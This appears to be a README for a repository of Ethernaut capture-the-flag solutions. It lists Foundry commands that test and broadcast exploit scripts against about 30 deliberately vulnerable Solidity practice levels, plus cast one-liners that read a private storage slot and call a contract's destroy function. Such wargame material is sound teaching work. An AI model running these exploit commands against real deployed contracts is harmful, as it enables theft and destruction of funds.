Ethernaut: https://ethernaut.openzeppelin.com/
Note: All commands below need to be executed in the root of this repository.
Table of Contents
- Common Setup
- Test All Exploit
- 0. Hello Ethernaut
- 1. Fallback
- 2. Fallout
- 3. Coin Flip
- 4. Telephone
- 5. Token
- 6. Delegation
- 7. Force
- 8. Vault
- 9. King
- 10. Re-entrancy
- 11. Elevator
- 12. Privacy
- 13. Gatekeeper One
- 14. Gatekeeper Two
- 15. Naught Coin
- 16. Preservation
- 17. Recovery
- 18. MagicNumber
- 19. Alien Codex
- 20. Denial
- 21. Shop
- 22. Dex
- 23. Dex Two
- 24. Puzzle Wallet
- 25. Motorbike
- 26. DoubleEntryPoint
- 27. Good Samaritan
- 28. Gatekeeper Three
- 29. Switch
Execute the following commands:
export PRIVATE_KEY=<PRIVATE KEY>
export RPC_URL=<RPC URL>
export FOUNDRY_ETH_RPC_URL=$RPC_URL
forge test --match-path "src/Ethernaut/*"
Test
forge test --match-contract HelloEthernautExploitTest -vvvv
Exploit on chain
forge script HelloEthernautExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract FallbackExploitTest -vvvv
Exploit on chain
forge script FallbackExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract FalloutExploitTest -vvvv
Exploit on chain
forge script FalloutExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract CoinFlipExploitTest -vvvv
Exploit on chain
forge script CoinFlipExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --slow --sig "run(address)" $INSTANCE_ADDRESS
Command to work around the bugs in foundry-rs/foundry#2489 and foundry-rs/foundry#5512 :
forge script CoinFlipExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --slow --sig "run(address)" $INSTANCE_ADDRESS --fork-block-number $(python -c "print($(cast block-number)-10)")
Test
forge test --match-contract TelephoneExploitTest -vvvv
Exploit on chain
forge script TelephoneExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract TokenExploitTest -vvvv
Exploit on chain
forge script TokenExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract DelegationExploitTest -vvvv
Exploit on chain
forge script DelegationExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract ForceExploitTest -vvvv
Exploit on chain
forge script ForceExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract VaultExploitTest -vvvv
Exploit on chain
forge script VaultExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
cast
command-only one-liner:
cast send --private-key $PRIVATE_KEY $INSTANCE_ADDRESS "unlock(bytes32)" $(cast storage $INSTANCE_ADDRESS 1)
Test
forge test --match-contract KingExploitTest -vvvv
Exploit on chain
forge script KingExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract ReentranceExploitTest -vvvv
Exploit on chain
forge script ReentranceExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract ElevatorExploitTest -vvvv
Exploit on chain
forge script ElevatorExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract PrivacyExploitTest -vvvv
Exploit on chain
forge script PrivacyExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract GatekeeperOneExploitTest -vvvv
Exploit on chain
forge script GatekeeperOneExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract GatekeeperTwoExploitTest -vvvv
Exploit on chain
forge script GatekeeperTwoExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract NaughtCoinExploitTest -vvvv
Exploit on chain
forge script NaughtCoinExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract PreservationExploitTest -vvvv
Exploit on chain
forge script PreservationtExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Exploit on chain
cast send --private-key $PRIVATE_KEY --gas-limit 100000 $INSTANCE_ADDRESS "destroy(address)" <TOKEN ADDRESS>
The token address can be easily found in a blockchain explorer.
Exploit written in Huff: https://github.com/minaminao/huff-ethernaut-magic-number
Test
forge test --match-contract MagicNumberExploitTest -vvvv
Exploit on chain
forge script MagicNumberExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract AlienCodexExploitTest -vvvv
Exploit on chain
forge script AlienCodexExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract DenialExploitTest -vvvv
Exploit on chain
forge script DenialExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract ShopExploitTest -vvvv
Exploit on chain
forge script ShopExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract DexExploitTest -vvvv
Exploit on chain
forge script DexExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract DexTwoExploitTest -vvvv
Exploit on chain
forge script DexTwoExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract PuzzleWalletExploitTest -vvvv
Exploit on chain
forge script PuzzleWalletExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
- Foundry test functions cannot detect that the code size has changed to 0.
- Anvil should be able to test it (WIP).
Exploit
forge script MotorbikeExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract DoubleEntryPointExploit -vvvv
Exploit on chain
forge script DoubleEntryPointExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract GoodSamaritanExploit -vvvv
Exploit on chain
forge script GoodSamaritanExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract GatekeeperThreeExploit -vvvv
Exploit on chain
forge script GatekeeperThreeExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS
Test
forge test --match-contract SwitchExploit -vvvv
Exploit on chain
forge script SwitchExploitScript -vvvv --private-key $PRIVATE_KEY --fork-url $RPC_URL --broadcast --sig "run(address)" $INSTANCE_ADDRESS